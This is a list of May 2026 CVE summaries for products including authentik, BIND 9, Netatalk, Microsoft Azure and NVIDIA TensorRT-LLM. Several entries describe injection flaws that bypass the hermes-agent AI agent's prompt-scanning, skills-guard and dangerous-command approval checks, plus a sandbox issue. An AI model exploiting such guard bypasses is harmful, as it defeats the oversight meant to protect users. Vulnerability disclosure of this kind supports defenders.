| FunnelKit–Funnel Builder for WooCommerce Checkout | Funnel Builder for WooCommerce Checkout prior to 3.15.0.3 contains a missing authorization vulnerability in the public checkout endpoint that allows unauthenticated attackers to invoke internal methods and write arbitrary data to the plugin’s External Scripts global setting. Attackers can inject malicious JavaScript through the External Scripts setting that executes in the browsers of all checkout page visitors. | 2026-05-19 | 7.5 | CVE-2026-47100 |
| Gmission–Web Fax | Improper input validation, Unrestricted upload of file with dangerous type vulnerability in Gmission Web Fax allows Remote Code Inclusion. This issue affects Web Fax: from 3.0 before 3.1. | 2026-05-21 | 8.4 | CVE-2026-9157 |
| GNU–GNU SASL | In GNU SASL before 2.2.3, DIGEST-MD5 has a NULL pointer dereference affecting both clients and servers, via a known token with no accompanying = character. This occurs in lib/digest-md5/getsubopt.c. | 2026-05-24 | 7.5 | CVE-2026-48829 |
| goauthentik–authentik | authentik is an open-source identity provider. Versions 2025.12.4 and prior, and versions 2026.2.0-rc1 through 2026.2.2 were vulnerable to Authentication Bypass through SAML NameID XML Comment Injection. Due to how authentik extracted the NameID value from a SAML assertion, it was possible for an attacker to trick authentik into only seeing a part of the NameID value, potentially allowing an attacker to gain access to other accounts. This issue could be exploited on an authentik instance with a SAML Source, where the attacker had an account on the SAML Source and the ability to modify their NameID value (commonly username or E-mail), and XML Signing was enabled. The attacker could modify the SAML assertion given to authentik by injecting a comment within the NameID value, which effectively truncated the NameID value to the snippet before the comment, and gave the attacker access to any user account. This issue has been fixed in versions 2025.12.5 and 2026.2.3. | 2026-05-20 | 8.7 | CVE-2026-40165 |
| goauthentik–authentik | authentik is an open-source identity provider. In versions prior to 2025.12.5 and 2026.2.0-rc1 through 2026.2.2, the PATCH /api/v3/core/users/{pk}/ API allows a caller with change_user on a target user to assign arbitrary groups through UserSerializer, including groups with is_superuser=True, without requiring enable_group_superuser, leading to privilege escalation. This bypasses the stricter permission model enforced in group-management paths and enables delegated user-management permissions to escalate target users to administrator-equivalent privilege. Users with permissions to update groups or permissions to update users are able to add themselves or other users they have permissions on to users which have superuser permissions. This issue has been fixed in versions 22025.12.5 and 2026.2.3. | 2026-05-22 | 8.1 | CVE-2026-40172 |
| H3C–Magic B0 | A vulnerability was found in H3C Magic B0 up to 100R002. This affects the function Edit_BasicSSID_5G of the file /goform/aspForm. Performing a manipulation of the argument param results in buffer overflow. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9393 |
| harmistechnology–Ek Rishta | Joomla! Component Ek Rishta 2.10 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cid parameter. Attackers can send GET requests to the user_detail view with malicious cid values containing SQL commands to extract sensitive database information. | 2026-05-23 | 8.2 | CVE-2018-25348 |
| harmistechnology–EkRishta | Joomla! Component EkRishta 2.10 contains an error-based SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code into the username parameter. Attackers can submit POST requests to the login endpoint with SQL injection payloads in the username field to extract database information including user credentials and system details. | 2026-05-23 | 8.2 | CVE-2018-25351 |
| hestiacp–hestiacp | HestiaCP versions 1.9.0 through 1.9.4 contain a deserialization vulnerability in the web terminal component caused by a session format mismatch between PHP and Node.js that allows unauthenticated remote attackers to achieve root-level code execution. Attackers can inject crafted data into HTTP headers that are processed by the PHP session handler but incorrectly deserialized by the Node.js web terminal component as trusted session values, resulting in arbitrary command execution on systems with the web terminal feature enabled. | 2026-05-19 | 10 | CVE-2026-43633 |
| hestiacp–hestiacp | HestiaCP versions 1.2.0 through 1.9.4 contain an IP spoofing vulnerability that allows unauthenticated remote attackers to bypass authentication security controls by supplying an arbitrary IP address in the CF-Connecting-IP HTTP header without verifying the request originated from Cloudflare’s network. Attackers can exploit this to circumvent fail2ban brute-force protection, bypass per-user IP allowlists, and poison authentication audit logs by spoofing trusted IP addresses on each request. | 2026-05-19 | 7.5 | CVE-2026-43634 |
| Honeywell International Inc.–Control Network Module (CNM) | Honeywell Control Network Module (CNM) contains command injection vulnerability in the web interface. An attacker could exploit this vulnerability via command delimiters, potentially resulting in Remote Code Execution (RCE). | 2026-05-21 | 9.1 | CVE-2026-5433 |
| iina–iina | IINA before 1.4.3 contains a user-assisted command execution vulnerability that allows remote attackers to execute arbitrary commands by supplying malicious mpv_-prefixed query parameters through the iina://open custom URL scheme handler. Attackers can deliver a crafted URL via a browser that passes unvalidated mpv_options/input-commands parameters into the mpv runtime, causing arbitrary command execution as the current macOS user upon approval of the browser protocol prompt without requiring a valid media file. | 2026-05-21 | 8.8 | CVE-2026-47114 |
| ISC–BIND 9 | BIND servers that are configured to use TKEY-based authentication via GSS-API tokens are vulnerable to excessive memory consumption when receiving and processing maliciously-constructed packets. Typically these servers will be found in Active Directory integrated DNS deployments and/or Kerberos-secured DNS environments. This issue affects BIND 9 versions 9.0.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.9.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 7.5 | CVE-2026-3039 |
| ISC–BIND 9 | A use-after-free vulnerability exists within the DNS-over-HTTPS implementation. This issue affects BIND 9 versions 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, and 9.20.9-S1 through 9.20.22-S1. BIND 9 versions 9.18.0 through 9.18.48 and 9.18.11-S1 through 9.18.48-S1 are NOT affected. | 2026-05-20 | 7.4 | CVE-2026-3593 |
| ISC–BIND 9 | Multiple flaws have been identified in `named` related to the handling of DNS messages whose CLASS is not Internet (`IN`) – for example, `CHAOS` or `HESIOD`, or DNS messages that specify meta-classes (`ANY` or `NONE`) in the question section. Specially crafted requests reaching the affected code paths – recursion, dynamic updates (`UPDATE`), zone change notifications (`NOTIFY`), or processing of `IN`-specific record types in non-`IN` data – can cause assertion failures in `named`. This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 7.5 | CVE-2026-5946 |
| ISC–BIND 9 | Undefined behavior may result due to a race condition leading to a use-after-free violation. If BIND receives an incoming DNS message signed with SIG(0), it begins work to validate that signature. If, during that validation, the “recursive-clients” limit is reached (as would occur during a query flood), and that same DNS message is discarded per the limit, there is a brief window of time while the SIG(0) validation may attempt to read the now-discarded DNS message. This issue affects BIND 9 versions 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, and 9.20.9-S1 through 9.20.22-S1. BIND 9 versions 9.18.28 through 9.18.49 and 9.18.28-S1 through 9.18.49-S1 are NOT affected. | 2026-05-20 | 7.5 | CVE-2026-5947 |
| itsourcecode–Electronic Judging System | A vulnerability has been found in itsourcecode Electronic Judging System 1.0. This affects an unknown part of the file /intrams/admin/login.php. The manipulation of the argument Username leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2026-05-24 | 7.3 | CVE-2026-9383 |
| ItzCrazyKns–Vane | A flaw has been found in ItzCrazyKns Vane up to 1.12.1. This vulnerability affects unknown code of the file src/app/api/providers/route.ts of the component Model Provider API. This manipulation of the argument baseURL causes server-side request forgery. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-24 | 7.3 | CVE-2026-9372 |
| ivanti–Secure Access Client | An improper certificate validation vulnerability in Ivanti Secure Access Client before 22.8R6 allows a remote unauthenticated attacker to execute arbitrary code. | 2026-05-22 | 8.8 | CVE-2026-8992 |
| jarrodwatts–claude-hud | Claude HUD through 0.0.12, patched in commit 234d9aa, contains a command injection vulnerability that allows local attackers to execute arbitrary commands by manipulating the COMSPEC environment variable. Attackers can set COMSPEC to an arbitrary binary path before claude-hud performs its version check, causing execFile() to execute the attacker-supplied executable with cmd.exe arguments, resulting in arbitrary code execution on Windows systems. | 2026-05-18 | 7.8 | CVE-2026-47092 |
| kovidgoyal–kitty | Kitty is a cross-platform GPU based terminal. In versions 0.46.2 and below, the handle_compose_command() function in kitty/graphics.c performs bounds validation on composition offsets using unsigned 32-bit arithmetic that is subject to integer wrapping, potentially leading to Heap Buffer Over-Read/Write. An attacker who can write escape sequences to a kitty terminal (e.g., via a malicious file, SSH login banner, or piped content) can supply crafted x_offset/y_offset values that pass the bounds check after wrapping but cause massive out-of-bounds heap memory access in compose_rectangles(). No user interaction is required. No non-default configuration is required. The attacker only needs the ability to produce output in a kitty terminal window. This issue has been fixed in version 0.47.0. | 2026-05-19 | 9.9 | CVE-2026-33642 |
| kovidgoyal–kitty | Kitty is a cross-platform GPU based terminal. Versions 0.46.2 and below contain a heap buffer overflow in load_image_data() that allows any process which can write to the terminal’s stdin to crash kitty immediately. The vulnerability is triggered by a single APC graphics protocol command with a PNG format declaration (f=100) whose payload exceeds twice the initial buffer capacity. The overflow is attacker-controlled in both length and content, causing DoS and potentially escalation to RCE itself. This issue has been fixed in version 0.47.0. | 2026-05-19 | 7.5 | CVE-2026-33633 |
| langgenius–dify | Dify version 1.14.1 and prior contains an authorization bypass vulnerability that allows authenticated editor users to set and enable trace configurations for any application regardless of tenant ownership. Attackers can exploit missing tenant ownership checks in the trace configuration endpoints to redirect all messages and responses from victim applications to attacker-controlled LLM trace providers. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. | 2026-05-18 | 7.4 | CVE-2026-41947 |
| langgenius–dify | Dify version 1.14.1 and prior contain a path traversal vulnerability that allows authenticated users to manipulate requests forwarded to the Plugin Daemon’s internal REST API by exploiting insufficient URL path sanitization. Attackers can traverse out of their authorized tenant path using unencoded dot sequences in task identifiers or manipulated filename parameters to access internal endpoints such as debug interfaces, requiring only knowledge of the victim tenant’s UUID. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. | 2026-05-18 | 7.7 | CVE-2026-41948 |
| laurent22–joplin | Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions prior to 3.5.7 contain a path traversal vulnerability in the importer which allows overwriting arbitrary files on disk. The OneNote converter does not sanitize the names of embedded files before writing them to disk. As a result, it’s possible for an attacker to create a malicious .one file that includes file names containing ../../, that are then interpreted as part of the target path when extracting attachments from the .one file. This issue has been patched in version 3.5.7. | 2026-05-18 | 8.2 | CVE-2026-22810 |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: pcrypt – Fix handling of MAY_BACKLOG requests MAY_BACKLOG requests can return EBUSY. Handle them by checking for that value and filtering out EINPROGRESS notifications. | 2026-05-19 | 9.8 | CVE-2026-43493 |
| LizardByte–Sunshine | Sunshine is a self-hosted game stream host for Moonlight. In versions prior to 2026.516.143833, the client-certificate authentication can be bypassed because of how OpenSSL verification results are handled. In src/crypto.cpp, the custom verify callback treats X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY, X509_V_ERR_CERT_NOT_YET_VALID, and X509_V_ERR_CERT_HAS_EXPIRED as success. This can allow an untrusted certificate to pass authentication and access protected HTTPS endpoints. This issue has been fixed in version 2026.516.143833. | 2026-05-22 | 9.8 | CVE-2026-32253 |
| Mattermost–Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to check integration URL for path traversal which allows an malicious authenticated user to call an arbitrary API via system admin Mattermost auth token using via path traversal in integration action URL.. Mattermost Advisory ID: MMSA-2026-00640 | 2026-05-21 | 8 | CVE-2026-4858 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to sanitize sensitive configuration fields before including them in support packet generation, which allows a Mattermost System Admin or any party with access to a support packet to obtain sensitive credentials in plaintext via downloading a support packet from the System Console.. Mattermost Advisory ID: MMSA-2026-00607 | 2026-05-18 | 8.7 | CVE-2026-6346 |
| Mattermost–Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to properly validate msgpack-encoded WebSocket frames before memory allocation which allows an unauthenticated remote attacker to crash the server process and cause a full service outage for all users via a crafted binary WebSocket message sent to the public WebSocket endpoint.. Mattermost Advisory ID: MMSA-2026-00647 | 2026-05-22 | 7.5 | CVE-2026-5740 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to sanitize sensitive configuration fields in the Mattermost Calls plugin which allows an attacker with access to a support packet to obtain TURN server credentials via the plaintext values present in the exported plugin configuration.. Mattermost Advisory ID: MMSA-2026-00605 | 2026-05-18 | 7.6 | CVE-2026-6347 |
| MediaArea–MediaInfoLib | MediaArea MediaInfoLib Channel Splitting heap-based buffer overflow vulnerability | 2026-05-20 | 7.8 | CVE-2026-22554 |
| MediaArea–MediaInfoLib | MediaArea MediaInfoLib LXF element parsing heap-based buffer overflow vulnerability | 2026-05-21 | 7.8 | CVE-2026-28764 |
| memcached–memcached | In memcached before 1.6.42, username data for SASL password database authentication has a timing side channel because a loop exits as soon as a valid username is found by sasl_server_userdb_checkpass. | 2026-05-20 | 8.1 | CVE-2026-47783 |
| memcached–memcached | In memcached before 1.6.42, password data for SASL password database authentication has a timing side channel because memcmp is used by sasl_server_userdb_checkpass. | 2026-05-20 | 8.1 | CVE-2026-47784 |
| Mesalvo–Meona Client Launcher Component | Improper Control of Generation of Code (‘Code Injection’) vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables code execution on other users’ systems. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 9 | CVE-2026-22314 |
| Mesalvo–Meona Client Launcher Component | Improper Access Control vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables a normal user gaining access to the admin panel. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 7.8 | CVE-2026-0856 |
| Mesalvo–Meona Client Launcher Component | Incorrect Privilege Assignment vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables the export of user data, including cleartext passwords, via the SQL editor. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 7.2 | CVE-2026-22315 |
| metaphorcreations–Ditty Responsive News Tickers, Sliders, and Lists | The Ditty – Responsive News Tickers, Sliders, and Lists plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.1.65. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to retrieve the full item content of non-public Dittys – including drafts, pending, scheduled, and disabled entries – by enumerating integer post IDs against the ditty_init AJAX endpoint. Unlike the non-AJAX init() counterpart, init_ajax() does not verify that the requested Ditty has a ‘publish’ post status before loading and returning its items, allowing content that administrators explicitly withheld from public view to be extracted. | 2026-05-22 | 7.5 | CVE-2026-9011 |
| Microsoft–Azure Local | Improper authentication in Azure Local Disconnected Operations allows an unauthorized attacker to elevate privileges over a network. | 2026-05-18 | 10 | CVE-2026-42822 |
| Microsoft–Azure Orbital Spatio | Unrestricted upload of file with dangerous type in Azure Orbital Spatio allows an unauthorized attacker to execute code over a network. | 2026-05-22 | 10 | CVE-2026-40412 |
| Microsoft–Azure Privileged Identity Management (PIM) | Authorization bypass through user-controlled key in Azure Privileged Identity Management (PIM) allows an authorized attacker to elevate privileges over a network. | 2026-05-22 | 8.8 | CVE-2026-35430 |
| Microsoft–Azure Resource Manager | Improper authentication in Azure Resource Manager (ARM) allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 10 | CVE-2026-47280 |
| Microsoft–Azure Stack HCI | Improper input validation in Azure Compute Gallery allows an authorized attacker to disclose information over a network. | 2026-05-22 | 7.7 | CVE-2026-26147 |
| Microsoft–Azure Virtual Network Gateway | Improper input validation in Azure Virtual Network Gateway allows an authorized attacker to execute code over a network. | 2026-05-22 | 9.9 | CVE-2026-40411 |
| Microsoft–Microsoft 365 Copilot for iOS | Improper neutralization of special elements used in a command (‘command injection’) in Microsoft Copilot allows an unauthorized attacker to perform tampering over a network. | 2026-05-22 | 9.3 | CVE-2026-41090 |
| Microsoft–Microsoft Edge (Chromium-based) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | 2026-05-18 | 8.8 | CVE-2026-45495 |
| Microsoft–Microsoft Entra | Origin validation error in Microsoft Entra ID allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 10 | CVE-2026-42901 |
| Microsoft–Microsoft Entra | Authentication bypass using an alternate path or channel in Microsoft Azure Active Directory B2C allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 9.1 | CVE-2026-33843 |
| Microsoft–Microsoft Global Secure Access (GSA) | Improper privilege management in Azure Entra ID allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 7.5 | CVE-2026-23663 |
| Microsoft–Microsoft Malware Protection Engine | Heap-based buffer overflow in Microsoft Defender allows an unauthorized attacker to execute code over a network. | 2026-05-20 | 8.1 | CVE-2026-45584 |
| Microsoft–Microsoft Malware Protection Engine | Improper link resolution before file access (‘link following’) in Microsoft Defender allows an authorized attacker to elevate privileges locally. | 2026-05-20 | 7.8 | CVE-2026-41091 |
| Microsoft–Microsoft Planetary Computer Pro (GeoCatalog) | Deserialization of untrusted data in Microsoft Planetary Computer Pro allows an unauthorized attacker to disclose information over a network. | 2026-05-22 | 10 | CVE-2026-41104 |
| Microsoft–Microsoft Power Pages | Improper neutralization of special elements used in a command (‘command injection’) in Microsoft Power Pages allows an unauthorized attacker to execute code over a network. | 2026-05-22 | 10 | CVE-2026-23652 |
| Microsoft–Microsoft SharePoint Enterprise Server 2016 | Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-05-22 | 8.8 | CVE-2026-45659 |
| Microsoft–Windows Admin Center in Azure Portal | Improper link resolution before file access (‘link following’) in Azure Portal Windows Admin Center allows an authorized attacker to elevate privileges locally. | 2026-05-20 | 7.8 | CVE-2026-42834 |
| Motorola–Phones | An improper authentication vulnerability was discovered in the Motorola Factory Test component (com.motorola.motocit). The application contained a reference to a writable file descriptor in external storage which could be used by third party apps running on the device to open a TCP server, exposing sensitive permissions and data. This could allow a local attacker to bypass permission checks and access protected device settings. | 2026-05-19 | 8.4 | CVE-2026-5804 |
| mullvad–mullvadvpn-app | Mullvad VPN is a VPN client app for desktop and mobile. When using macOS with versions 2026.1 and below, Mullvad VPN may allow local privilege escalation during installation or upgrade. The installer package executes binaries from /Applications/Mullvad VPN.app without verifying if the bundle is attacker-controlled or that the path is the legitimate Mullvad application. A user in the admin group can pre-place a crafted application bundle at that location and may be able to achieve code execution as root. Since the issue only affected the installer, there is no immediate need for users to update if they are already running an older version. This issue has been fixed in version 2026.2-beta1. | 2026-05-19 | 7.3 | CVE-2026-32323 |
| n/a–exifreader | This affects versions of the package exifreader before 4.39.0. A crafted image containing an ICC mluc tag can set an attacker-controlled record count together with a zero record size. During parsing, ExifReader repeatedly processes the same record and appends entries to an array without sufficient bounds validation, causing excessive memory growth. In applications that parse attacker-supplied images, this may lead to denial of service through memory exhaustion. | 2026-05-19 | 7.5 | CVE-2026-8813 |
| n/a–lwIP | A vulnerability was found in lwIP up to 2.2.1. Affected is the function snmp_parse_inbound_frame of the file src/apps/snmp/snmp_msg.c of the component snmpv3 USM Handler. Performing a manipulation of the argument msgAuthenticationParameters results in stack-based buffer overflow. The attack may be initiated remotely. The patch is named 0c957ec03054eb6c8205e9c9d1d05d90ada3898c. It is suggested to install a patch to address this issue. | 2026-05-18 | 9.8 | CVE-2026-8836 |
| n/a–shell-quote | shell-quote’s `quote()` function did not validate object-token inputs against the operator model used by `parse()`. The `.op` field was backslash-escaped character by character using `/(.)/g`, which in JavaScript does not match line terminators (n, r, U+2028, U+2029). A line terminator in `.op` therefore passed through unescaped into the output; POSIX shells treat a literal newline as a command separator, so any content after it would execute as a second command. The vulnerable code path is reachable in two ways: (1) direct construction of `{ op: ‘…n…’ }` from external input, and (2) via `parse(cmd, envFn)` when `envFn` returns object tokens whose `.op` is attacker-influenced. Both are documented API surface. Fixed by replacing the per-character escape with strict shape validation: `.op` must match the parser’s control-operator allowlist; `{ op: ‘glob’, pattern }` validates `pattern` and forbids line terminators; `{ comment }` validates `comment` and forbids line terminators; any other object shape throws `TypeError`. | 2026-05-22 | 8.1 | CVE-2026-9277 |
| NeoRazorX–facturascripts | FacturaScripts is an open source accounting and invoicing software. Versions 2026 and below contain a critical vulnerability in the Plugins::add() function. The system fails to properly validate the file paths within uploaded ZIP archives. This allows an attacker to perform a Zip Slip attack, leading to Arbitrary File Write and Remote Code Execution (RCE) by overwriting sensitive .php files outside the designated plugins directory. The vulnerability is located in Plugins.php. While the testZipFile function attempts to validate that the ZIP contains only one root folder, it does not sanitize or validate the individual file paths within that folder. An attacker can bypass this check by naming a file ValidPluginName/../../shell.php. The explode function will see ValidPluginName as the root folder, satisfying the count($folders) != 1 check. However, during extraction, the ../../ sequence triggers a path traversal, allowing the file to be written anywhere the web server has permissions the root directory. This issue is fixed in version 2026.1. | 2026-05-18 | 7.2 | CVE-2026-27891 |
| Netatalk–Netatalk | A heap-based buffer overflow in the CNID daemon comm_rcv() function in Netatalk 2.0.0 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code with escalated privileges or cause a denial of service. | 2026-05-21 | 9.9 | CVE-2026-44050 |
| Netatalk–Netatalk | An SQL injection vulnerability in the MySQL CNID backend in Netatalk 3.1.0 through 4.4.2 allows a remote authenticated attacker to obtain unauthorized access to data, modify data, or cause a denial of service. | 2026-05-21 | 8.8 | CVE-2026-44047 |
| Netatalk–Netatalk | A stack-based buffer overflow via UCS-2 type confusion in convert_charset() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service. | 2026-05-21 | 8.8 | CVE-2026-44048 |
| Netatalk–Netatalk | An improper link resolution vulnerability in Netatalk 3.0.2 through 4.4.2 allows a remote authenticated attacker to read arbitrary files or overwrite arbitrary files via attacker-controlled symlink creation. | 2026-05-21 | 8.1 | CVE-2026-44051 |
| Netatalk–Netatalk | An out-of-bounds write due to improper null termination in convert_charset() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service via crafted character data. | 2026-05-21 | 7.5 | CVE-2026-44049 |
| Netatalk–Netatalk | Netatalk 2.1.0 through 4.4.2 inserts LDAP simple-bind passwords into log output in cleartext, which allows an attacker with access to the log files to obtain LDAP credentials. | 2026-05-21 | 7.5 | CVE-2026-44052 |
| Netatalk–Netatalk | Netatalk 1.5.0 through 4.2.2 uses a broken cryptographic algorithm in the DHCAST128 UAM, which allows a remote attacker to obtain authentication credentials or impersonate a user via cryptanalytic attack. | 2026-05-21 | 7.4 | CVE-2026-44053 |
| Netatalk–Netatalk | A logic error involving bitwise OR operations in Netatalk 3.1.4 through 4.4.2 allows a remote authenticated attacker to inject OS commands and execute arbitrary code. | 2026-05-21 | 7.5 | CVE-2026-44055 |
| Netatalk–Netatalk | An integer underflow in dsi_writeinit() in Netatalk 1.5.0 through 4.4.2 allows a remote unauthenticated attacker to cause a denial of service via a crafted DSI write request. | 2026-05-21 | 7.5 | CVE-2026-44060 |
| Netatalk–Netatalk | A missing output length bounds check in pull_charset_flags() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service via crafted character set data. | 2026-05-21 | 7.5 | CVE-2026-44062 |
| Netatalk–Netatalk | An out-of-bounds read in ASP session ID handling in Netatalk 1.3 through 4.4.2 allows an adjacent network attacker to obtain limited information or cause a denial of service via a crafted ASP request. | 2026-05-21 | 7.1 | CVE-2026-44064 |
| Netatalk–Netatalk | Multiple heap out-of-bounds reads in the Spotlight RPC unmarshalling code in Netatalk 3.1.0 through 4.4.2 allow a remote authenticated attacker to obtain sensitive information or cause a minor service disruption. | 2026-05-21 | 7.1 | CVE-2026-44066 |
| Netatalk–Netatalk | Incomplete sanitization of extended attribute (EA) path components in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to write to files outside the intended metadata namespace via crafted EA names. | 2026-05-21 | 7.6 | CVE-2026-44068 |
| nimiq–core-rs-albatross | nimiq-blockchain provides persistent block storage for Nimiq’s Rust implementation. In versions 1.3.0 and below, a malicious network peer can crash any Nimiq full node by publishing a crafted Kademlia DHT record. The maliciously crafted record would contain a TaggedSigned<ValidatorRecord, KeyPair> with a signature field whose byte length is not exactly 64 in order to cause a crash. When the victim node’s DHT verifier calls TaggedSigned::verify, execution reaches Ed25519Signature::from_bytes(sig).unwrap() in the TaggedPublicKey implementation for Ed25519PublicKey. The from_bytes call fails because ed25519_zebra::Signature::try_from rejects slices not 64 bytes, and the unwrap() panics. The BLS TaggedPublicKey implementation correctly returns false on error; only the Ed25519 implementation panics. This issue has been fixed in version 1.4.0. | 2026-05-20 | 7.5 | CVE-2026-40092 |
| NousResearch–hermes-agent | A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This affects the function check_all_command_guards of the file tools/approval.py of the component Batch Runner. Such manipulation leads to missing authorization. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9350 |
| NousResearch–hermes-agent | A security vulnerability has been detected in NousResearch hermes-agent up to 2026.4.23. Impacted is an unknown function of the file agent/skills_guard.py of the component Skills Guard Multi-Word Prompt Handler. The manipulation of the argument THREAT_PATTERNS leads to injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9353 |
| NousResearch–hermes-agent | A vulnerability was found in NousResearch hermes-agent 2026.4.23. The impacted element is the function _scan_context_content of the file agent/prompt_builder.py. The manipulation results in injection. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9366 |
| NousResearch–hermes-agent | A vulnerability was determined in NousResearch hermes-agent up to 5157f5427f19488b31c6fdebbacd15d798ce7f63. This affects the function detect_dangerous_command of the file tools/approval.py of the component terminal_tool. This manipulation causes os command injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9367 |
| NousResearch–hermes-agent | A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This impacts the function execute_code of the file tools/code_execution_tool.py of the component Environment Variable Handler. Such manipulation leads to sandbox issue. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 7.3 | CVE-2026-9368 |
| nukeviet–nukeviet | NukeViet CMS is a multi Content Management System. Versions 4.5.07 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability caused by insufficient server-side input sanitization in the Request class. The application relies primarily on client-side filtering to sanitize HTML tags and attributes in user-submitted content, which can be bypassed by intercepting and modifying HTTP requests directly (e.g., using Burp Suite). An attacker can inject malicious payloads which are stored server-side and executed in the browser of any user who views the content. Anyone viewing user-submitted content (such as administrators and moderators reviewing contact messages or comments) is impacted, and the vulnerability can be exploited by any anonymous visitor without authentication, with the Contact module used only as a proof of concept. Potential consequences include session hijacking through cookie theft, unauthorized actions performed under the victim’s identity, defacement or redirection to phishing pages, and phishing attacks via manipulated email notifications. This issue has been fixed in version 4.5.08. If developers are unable to upgrade immediately, they should work around this issue by implementing server-side HTML sanitization in the Request class to strip or encode dangerous tags and attributes (e.g., <iframe>, srcdoc, event handlers like onerror/onload), enforcing a Content Security Policy (CSP) to restrict inline script execution, and set cookies with the HttpOnly flag to mitigate cookie theft via XSS. | 2026-05-22 | 8.7 | CVE-2026-41147 |
| NVIDIA–BioNeMo Framework | NVIDIA BioNeMo Core for Linux contains a vulnerability where a user could cause a path traversal by loading a malicious file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. | 2026-05-20 | 8.8 | CVE-2026-24217 |
| NVIDIA–BioNeMo Framework | NVIDIA BioNemo for Linux contains a vulnerability where a user could cause a deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. | 2026-05-20 | 7.8 | CVE-2026-24216 |
| NVIDIA–DGX Spark | NVIDIA DGX OS contains a vulnerability in the factory provisioning process, where the cloning of a base image causes identical SSH host keys to be deployed across multiple systems. The sharing of cryptographic identifiers across all similarly provisioned systems enables host impersonation or attacker-in-the-middle attacks. A successful exploit of this vulnerability might lead to code execution, data tampering, escalation of privileges, information disclosure, and denial of service. | 2026-05-20 | 8.1 | CVE-2026-24218 |
| NVIDIA–TensorRT | NVIDIA TensorRT contains a vulnerability where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to data tampering. | 2026-05-20 | 8.2 | CVE-2026-24188 |
| NVIDIA–TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a vulnerability in MPI server, where an attacker could cause an unsafe deserialization. A successful exploit of this vulnerability might lead to code execution, denial of service, data tampering, and information disclosure. | 2026-05-20 | 7.5 | CVE-2025-33255 |
| NVIDIA–TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a vulnerability in RPC testing, where an attacker could cause an unsafe deserialization. A successful exploit of this vulnerability might lead to code execution, denial of service, data tampering, and information disclosure. | 2026-05-20 | 7.5 | CVE-2026-24163 |
